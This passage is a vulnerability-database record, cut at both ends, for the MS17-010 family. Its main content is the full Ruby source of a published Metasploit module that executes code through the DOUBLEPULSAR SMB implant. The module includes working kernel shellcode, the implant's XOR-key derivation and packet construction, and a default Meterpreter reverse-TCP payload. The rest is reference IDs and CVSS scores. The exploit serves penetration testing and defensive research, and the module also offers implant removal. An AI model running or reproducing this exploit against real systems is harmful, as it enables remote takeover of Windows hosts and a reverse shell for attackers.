"700059.PRM"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-27802", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27803", "1337DAY-ID-27752"]}, {"type": 
"huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0144"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96704", "SMNTC-96705", "SMNTC-96706", "SMNTC-96707", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, 
{"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}], "modified": "2021-09-01T22:14:48", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-01T22:14:48", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 
'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n 
s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 
'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-02] #"}, "lastseen": "2021-09-01T22:14:48", "differentElements": ["sourceData"], "edition": 4}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "6a7e5132f68eb285b13fba6b45c4d0cf", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-02T22:14:10", "history": [], "viewCount": 110, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:142603"]}, {"type": "nessus", "idList": ["700059.PRM", 
"700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "exploitdb", "idList": ["EDB-ID:42031", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96705", "SMNTC-96703", "SMNTC-96707", "SMNTC-96704", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", 
"TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": 